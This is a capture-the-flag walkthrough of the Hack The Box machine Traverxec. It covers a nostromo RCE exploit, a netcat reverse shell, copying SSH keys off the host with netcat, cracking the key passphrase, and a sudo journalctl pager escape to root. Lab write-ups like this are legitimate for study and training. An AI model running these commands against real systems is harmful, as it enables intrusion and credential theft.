Step 1. Reconnaissance & Enumeration

nmap -Pn -n -p- -g 53 traverxec.htb --min-rate 1000 -oA port_scan
cat port_scan.nmap | grep "open" | cut -d '/' -f 1 > port_scan.txt
cat port_scan.txt | tr '\n' ',' | sed s/,$// > port_scan.txt
nmap -Pn -n -sC -sV -p `cat port_scan.txt` traverxec.htb -oA version_scan

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
|   2048 aa:99:a8:16:68💿41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
|   256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_  256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open  http    nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

On looking for nostromo exploit we found RCE vulnerability.

python cve2019_16278.py traverxec.htb 80 id
HTTP/1.1 200 OK
Date: Wed, 22 Apr 2020 11:17:05 GMT
Server: nostromo 1.9.6
Connection: close


uid=33(www-data) gid=33(www-data) groups=33(www-data)

In order to get a reverse shell we can use Netcat. Let’s start a Netcat listener on our local machine.

nc -lvp 6677
listening on [any] 6677 ...

The execute the following coomand to get a shell.

python cve2019_16278.py traverxec.htb 80 "nc -e bash 10.10.16.18 6677"

Next a TTY shell can be spawned using python.

python -c 'import pty;pty.spawn("/bin/bash")'

Step 2. Lateral Movement

Let’s enumerate the system to find privilege escalation vectors. The /etc/passwd file reveals a user named david . It also reveals that the Nostromo web root is /var/nostromo/ . The folder /var/nostromo/conf contains the web server configuration files.

The file nhttpd.conf and .htpasswd seem interesting. The .htpasswd contains a password hash, which is crackable, but it turns out to be of no use. The nhttpd.conf file contains the following configuration.

# MAIN [MANDATORY]

servername              traverxec.htb
serverlisten            *
serveradmin             david@traverxec.htb
serverroot              /var/nostromo
servermimes             conf/mimes
docroot                 /var/nostromo/htdocs
docindex                index.html

# LOGS [OPTIONAL]

logpid                  logs/nhttpd.pid

# SETUID [RECOMMENDED]

user                    www-data

# BASIC AUTHENTICATION [OPTIONAL]

htaccess                .htaccess
htpasswd                /var/nostromo/conf/.htpasswd

# ALIASES [OPTIONAL]

/icons                  /var/nostromo/icons

# HOMEDIRS [OPTIONAL]

homedirs                /home
homedirs_public         public_www

The HOMEDIRS section determines that there might be a public_www folder in the user’s home directory. The home directory of the user is not readable, however public_www is found to be accessible. The folder contains a protected-file-area sub-folder.

ls -al /home/david/public_www/protected-file-area

Enumeration of the folder reveals some backed up SSH keys. Let’s transfer them to our box using netcat. Run the following command locally to receive the file.

nc -lvp 6688 > backup.tgz
listening on [any] 6688 ...

Next, run the following command on the server to complete the transfer.

nc 10.10.16.18 6688 < /home/david/public_www/protected-file-area/backup-ssh-identity-files.tgz

Let’s extract the files inside backup-ssh-identity-files.tgz.

tar -xvf backup-ssh-identity-files.tgz

The archive is found to contain SSH keys out of which, the private key id_rsa can be potentially be used to login as david .

chmod 400 id_rsa
ssh -i id_rsa david@10.10.10.165

The authenticity of host 'traverxec.htb (10.10.10.165)' can't be established.
ECDSA key fingerprint is SHA256:CiO/pUMzd+6bHnEhA2rAU30QQiNdWOtkEPtJoXnWzVo.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'traverxec.htb,10.10.10.165' (ECDSA) to the list of known hosts.
Enter passphrase for key 'id_rsa':

However, the private key is encrypted and needs a password. Let’s use john to try and crack it. First, extract the hash from the RSA key using ssh2john .

python3 /usr/share/john/ssh2john.py id_rsa > hash.txt

Next, crack it using john and the rockyou.txt wordlist

john --wordlist=/home/root/Documents/rockyou.txt hash.txt
john --show hash.txt
id_rsa:hunter

Now by logging into david user we get the user flag.

Step 3. Privilege Escalation

The user’s home directory contains a folder called bin with the following contents.

cat server-stats.sh

#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat

The last line is interesting as it executes journalctl using sudo. Let’s run the script to see the output.

./servers-stats.sh

The script returns the last 5 lines of the nostromo service logs using journalctl. This is exploitable because journalctl invokes the default pager, which is likely to be less . The less command displays output on the user’s screen and waits for user input once the content is displayed. This can be exploited by running a shell command.

/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service

The command above will invoke less , after which we can run shell commands by prefixing ! . Let’s try executing /bin/bash.

!/bin/bash

The execution was successful and root shell is spawned. The root flag is located in /root/ .

References:

  1. Official HTB Writeup